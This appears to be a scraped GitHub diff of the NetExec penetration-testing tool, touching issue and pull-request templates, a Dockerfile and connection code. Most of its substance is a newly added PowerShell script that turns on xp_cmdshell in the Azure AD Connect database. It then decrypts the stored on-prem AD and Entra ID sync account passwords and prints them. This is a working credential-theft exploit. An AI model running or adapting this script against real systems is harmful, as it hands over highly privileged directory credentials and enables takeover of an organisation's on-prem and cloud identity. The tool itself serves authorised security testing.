blacklanternsecurity
diff --git a/‎.github/ISSUE_TEMPLATE/bug_report.md‎
Lines changed: 6 additions & 2 deletions b/‎.github/ISSUE_TEMPLATE/bug_report.md‎
Lines changed: 6 additions & 2 deletions
diff --git a/‎.github/PULL_REQUEST_TEMPLATE.md‎
Lines changed: 5 additions & 1 deletion b/‎.github/PULL_REQUEST_TEMPLATE.md‎
Lines changed: 5 additions & 1 deletion
diff --git a/‎Dockerfile‎
Lines changed: 36 additions & 13 deletions b/‎Dockerfile‎
Lines changed: 36 additions & 13 deletions
diff --git a/‎nxc/config.py‎
Lines changed: 0 additions & 1 deletion b/‎nxc/config.py‎
Lines changed: 0 additions & 1 deletion
diff --git a/‎nxc/connection.py‎
Lines changed: 13 additions & 1 deletion b/‎nxc/connection.py‎
Lines changed: 13 additions & 1 deletion
diff --git a/‎nxc/data/msol_dump/entra-sync-creds.ps1‎
Lines changed: 82 additions & 0 deletions b/‎nxc/data/msol_dump/entra-sync-creds.ps1‎
Lines changed: 82 additions & 0 deletions
diff --git a/‎nxc/data/msol_dump/msol_dump.ps1‎
Lines changed: 0 additions & 65 deletions b/‎nxc/data/msol_dump/msol_dump.ps1‎
Lines changed: 0 additions & 65 deletions
@@ -1,3 +1,5 @@
+# ❗❗❗ Before filing this bug report, MAKE SURE you have already downloaded the newest version of NetExec from GitHub and installed it! Many issues have already been reported and fixed, _especially_ if you are running the native Kali version! Please delete this line before submitting your issue if you have done so.❗❗❗
+
 ---
 name: Bug report
 about: Create a report to help us improve
@@ -7,6 +9,8 @@ assignees: ''
 
 ---
 
+
+
 **Describe the bug**
 A clear and concise description of what the bug is.
 
@@ -30,8 +34,8 @@ If applicable, add screenshots to help explain your problem.
 
 **NetExec info**
  - OS: [e.g. Kali]
- - Version of nxc: [e.g. v1.5.2]
- - Installed from: apt/github/pip/docker/...? Please try with latest release before openning an issue
+ - Version of nxc: [e.g. v1.5.2] (run nxc --version and post the _exact_ string that is output)
+ - Installed from: apt/github/pip/docker/...? Please try with latest release before opening an issue
 
 **Additional context**
 Add any other context about the problem here.
@@ -4,9 +4,12 @@ Please include a summary of the change and which issue is fixed, or what the enh
 List any dependencies that are required for this change.
 
 ## Type of change
+Insert an "x" inside the brackets for relevant items (do not delete options)
+
 - [ ] Bug fix (non-breaking change which fixes an issue)
 - [ ] New feature (non-breaking change which adds functionality)
 - [ ] Breaking change (fix or feature that would cause existing functionality to not work as expected)
+- [ ] Deprecation of feature or functionality
 - [ ] This change requires a documentation update
 - [ ] This requires a third party update (such as Impacket, Dploot, lsassy, etc)
 
@@ -21,9 +24,10 @@ Screenshots are always nice to have and can give a visual representation of the
 If appropriate include before and after screenshot(s) to show which results are to be expected.
 
 ## Checklist:
+Insert an "x" inside the brackets for completed and relevant items (do not delete options)
 
 - [ ] I have ran Ruff against my changes (via poetry: `poetry run python -m ruff check . --preview`, use `--fix` to automatically fix what it can)
-- [ ] I have added or updated the tests/e2e_commands.txt file if necessary
+- [ ] I have added or updated the `tests/e2e_commands.txt` file if necessary (new modules or features are _required_ to be added to the e2e tests)
 - [ ] New and existing e2e tests pass locally with my changes
 - [ ] If reliant on changes of third party dependencies, such as Impacket, dploot, lsassy, etc, I have linked the relevant PRs in those projects
 - [ ] I have performed a self-review of my own code
 
@@ -1,22 +1,45 @@
-FROM python:3.11-slim
-
+FROM python:3.13-slim-bookworm AS builder
 ENV LANG=C.UTF-8
 ENV LC_ALL=C.UTF-8
 ENV PIP_NO_CACHE_DIR=off
 
 WORKDIR /usr/src/netexec
 
-RUN apt-get update && \
-    apt-get install -y libffi-dev libxml2-dev libxslt-dev libssl-dev openssl autoconf g++ python3-dev curl git
-RUN apt-get update
-# Get Rust
-RUN curl https://sh.rustup.rs -sSf | bash -s -- -y
-# Add .cargo/bin to PATH
+RUN apt update && \
+    apt install -y --no-install-recommends \
+        libffi-dev \
+        libxml2-dev \
+        libxslt-dev \
+        libssl-dev \
+        openssl \
+        autoconf \
+        g++ \
+        python3-dev \
+        curl \
+        git \
+        unzip \
+    && apt clean && rm -rf /var/lib/apt/lists/*
+
+RUN curl https://sh.rustup.rs -sSf | bash -s -- -y --default-toolchain stable
 ENV PATH="/root/.cargo/bin:${PATH}"
-# Check cargo is visible
-RUN cargo --help
 
-COPY . .
-RUN pip install .
+RUN git clone https://github.com/Pennyw0rth/NetExec.git . \
+    && pip install .
+
+FROM python:3.13-slim-bookworm
+
+ENV LANG=C.UTF-8
+ENV LC_ALL=C.UTF-8
+ENV PIP_NO_CACHE_DIR=off
+
+WORKDIR /usr/src/netexec
+
+COPY --from=builder /usr/local/lib/python3.13/site-packages /usr/local/lib/python3.13/site-packages
+COPY --from=builder /usr/local/bin /usr/local/bin
+
+RUN apt update && \
+    apt install -y --no-install-recommends \
+        openssl \
+    && apt clean && rm -rf /var/lib/apt/lists/*
 
-ENTRYPOINT [ "nxc" ]
+ENTRYPOINT ["nxc"]
@@ -36,7 +36,6 @@
 audit_mode = nxc_config.get("nxc", "audit_mode", fallback=False)
 reveal_chars_of_pwd = int(nxc_config.get("nxc", "reveal_chars_of_pwd", fallback=0))
 config_log = nxc_config.getboolean("nxc", "log_mode", fallback=False)
-ignore_opsec = nxc_config.getboolean("nxc", "ignore_opsec", fallback=False)
 host_info_colors = literal_eval(nxc_config.get("nxc", "host_info_colors", fallback=["green", "red", "yellow", "cyan"]))
 
 
 
@@ -1,3 +1,5 @@
+from datetime import datetime
+import os
 import random
 import sys
 import contextlib
@@ -15,6 +17,7 @@
 from nxc.loaders.moduleloader import ModuleLoader
 from nxc.logger import nxc_logger, NXCAdapter
 from nxc.context import Context
+from nxc.paths import NXC_PATH
 from nxc.protocols.ldap.laps import laps_search
 from nxc.helpers.pfx import pfx_auth
 
@@ -136,7 +139,11 @@ def __init__(self, args, db, target):
         # Authentication info
         self.password = ""
         self.username = ""
-        self.kerberos = bool(self.args.kerberos or self.args.use_kcache or self.args.aesKey or (hasattr(self.args, "delegate") and self.args.delegate))
+        self.kerberos = bool(self.args.kerberos or
+                             self.args.use_kcache or
+                             self.args.aesKey or
+                             (hasattr(self.args, "delegate") and self.args.delegate) or
+                             (hasattr(self.args, "no_preauth_targets") and self.args.no_preauth_targets))
         self.aesKey = None if not self.args.aesKey else self.args.aesKey[0]
         self.use_kcache = None if not self.args.use_kcache else self.args.use_kcache
         self.admin_privs = False
@@ -152,6 +159,11 @@ def __init__(self, args, db, target):
         self.local_ip = None
         self.dns_server = self.args.dns_server
 
+        # Construct the output file template using os.path.join for OS compatibility
+        base_log_dir = os.path.join(os.path.expanduser(NXC_PATH), "logs")
+        filename_pattern = f"{self.hostname}_{self.host}_{datetime.now().strftime('%Y-%m-%d_%H%M%S')}".replace(":", "-")
+        self.output_file_template = os.path.join(base_log_dir, "{output_folder}", filename_pattern)
+
         # DNS resolution
         dns_result = self.resolver(target)
         if dns_result:
 
@@ -0,0 +1,82 @@
+# Original script by @_xpn_: https://gist.github.com/xpn/f12b145dba16c2eebdd1c6829267b90c
+# Modified by @NeffIsBack:
+# - Added support for Entra ID sync credentials (original source: https://github.com/Gerenios/AADInternals-Endpoints/blob/6af2054705e900b733ba76c6e65bfa6cad2328cc/AADSyncSettings.ps1#L108-L116)
+
+# Function to decrypt the encrypted configuration of the Azure AD Connect sync stuff
+function decrypter($crypted, $key_id, $instance_id, $entropy) {
+    $cmd = $client.CreateCommand()
+    $cmd.CommandText = "EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'powershell.exe -c `"add-type -path ''C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll'';`$km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager;`$km.LoadKeySet([guid]''$entropy'', [guid]''$instance_id'', $key_id);`$key2 = `$null;`$km.GetKey(1, [ref]`$key2);`$decrypted = `$null;`$key2.DecryptBase64ToString(''$crypted'', [ref]`$decrypted);Write-Host `$decrypted`"'"
+    $reader = $cmd.ExecuteReader()
+
+    $decrypted = [string]::Empty
+
+    while ($reader.Read() -eq $true -and $reader.IsDBNull(0) -eq $false) {
+        $decrypted += $reader.GetString(0)
+    }
+    $reader.Close()
+
+    if ($decrypted -eq [string]::Empty) {
+        Write-Host "[!] Error using xp_cmdshell to launch our decryption powershell"
+        return
+    }
+
+    return $decrypted
+}
+
+# Create a connection to the localdb instance of Azure AD Connect
+$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync2019;Initial Catalog=ADSync"
+
+try {
+    $client.Open()
+} catch {
+    Write-Host "[!] Could not connect to localdb, Entra ID sync probably not installed"
+    return
+}
+
+function f {
+    param ($q)
+    $c = $client.CreateCommand()
+    $c.CommandText = $q
+    $r = $c.ExecuteReader()
+    if (-not $r.Read()) {
+        Write-Host "[!] Error querying: $q"
+        return
+    }
+    $res = for ($i = 0; $i -lt $r.FieldCount; $i++) { $r.GetValue($i) }
+    $r.Close()
+    return $res
+}
+
+# Get keyset_id, instance_id, entropy
+$out = f "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration"
+if (-not $out) { return }
+$key_id, $instance_id, $entropy = $out
+
+# Get and decrypt on-prem AD credentials
+$out = f "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'"
+if (-not $out) { return }
+$on_prem, $c = $out
+$pd = decrypter $c $key_id $instance_id $entropy
+
+# Get and decrypt Entra ID sync credentials
+$out = f "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE subtype = 'Windows Azure Active Directory (Microsoft)'"
+if (-not $out) { return }
+$entra, $c = $out
+$qd = decrypter $c $key_id $instance_id $entropy
+
+
+
+# Extract the credentials from the decrypted XML configurations
+$domain = select-xml -Content $on_prem -XPath "//parameter[@name='forest-login-domain']" | select @{Name = 'Domain'; Expression = {$_.node.InnerText}}
+$username = select-xml -Content $on_prem -XPath "//parameter[@name='forest-login-user']" | select @{Name = 'Username'; Expression = {$_.node.InnerText}}
+$pw = select-xml -Content $pd -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerText}}
+
+Write-Host "On-prem Domain: $($domain.Domain)"
+Write-Host "On-prem Username: $($username.Username)"
+Write-Host "On-prem Password: $($pw.Password)"
+
+# Extract the Entra ID sync credentials
+$entra_user = ([xml]$entra).MAConfig.'parameter-values'.parameter[0].'#text'
+$entra_pw = select-xml -Content $qd -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerText}}
+Write-Host "Entra ID Username: $($entra_user)"
+Write-Host "Entra ID Password: $($entra_pw.Password)"